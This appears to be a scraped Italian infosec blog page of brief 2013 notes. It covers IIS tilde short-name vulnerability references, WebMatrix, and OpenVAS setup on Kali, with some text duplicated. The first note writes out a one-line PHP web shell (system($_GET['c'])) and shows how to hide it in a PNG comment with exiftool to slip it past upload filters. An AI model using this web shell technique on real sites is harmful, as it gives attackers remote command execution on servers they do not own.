1) Creare un file.php con il seguente codice (ad esempio):
<?php system($_GET['c']); ?>
2) Iniettarlo in un'immagine usando exiftool:
# exiftool "-comment<=file.php" malicious.png
Info Security Notes
19/07/13
12/06/13
WebMatrix
WebMatrix e' un "web development tool" che supporta diverse tecnologie e puo' essere utilizzato per testare/studiare applicazioni web di terze parti:
http://www.microsoft.com/web/webmatrix/
http://www.microsoft.com/web/webmatrix/
11/06/13
Microsoft IIS Tilde Character Information Vulnerability
Vulterabilita' non nuovissima, ma ancora molto utile:
http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
http://www.exploit-db.com/exploits/19525/
Al seguente link e' possibile scaricare lo scanner di cui si parla nel documento:
https://code.google.com/p/iis-shortname-scanner-poc/downloads/detail?name=scanner_source_and_compiled.zip
http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
http://www.exploit-db.com/exploits/19525/
Al seguente link e' possibile scaricare lo scanner di cui si parla nel documento:
https://code.google.com/p/iis-shortname-scanner-poc/downloads/detail?name=scanner_source_and_compiled.zip
OpenVas: a Nessus alternative - Kali Linux
1) Effettuare il setup:
# openvas-setup
2) Eseguire il seguente comando per individuare il process "gsad":
# neststat -anpt | grep gsad
tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 3558/gsad
3) Killare il processo gsad.
4) Riavviare gsad usando il seguente comando
# gsad --http-only --listen=127.0.0.1 -p 9392
5) Aggiungere un "admin user":
# openvasad -c 'add_user' -n nome_utente -r Admin
6) collegarsi via browser al seguente indirizzo:
http://127.0.0.1:9392 ed effettuare il login con l'utente creato.
# openvas-setup
2) Eseguire il seguente comando per individuare il process "gsad":
# neststat -anpt | grep gsad
tcp 0 0 127.0.0.1:9392 0.0.0.0:* LISTEN 3558/gsad
3) Killare il processo gsad.
4) Riavviare gsad usando il seguente comando
# gsad --http-only --listen=127.0.0.1 -p 9392
5) Aggiungere un "admin user":
# openvasad -c 'add_user' -n nome_utente -r Admin
6) collegarsi via browser al seguente indirizzo:
http://127.0.0.1:9392 ed effettuare il login con l'utente creato.
Iscriviti a:
Post (Atom)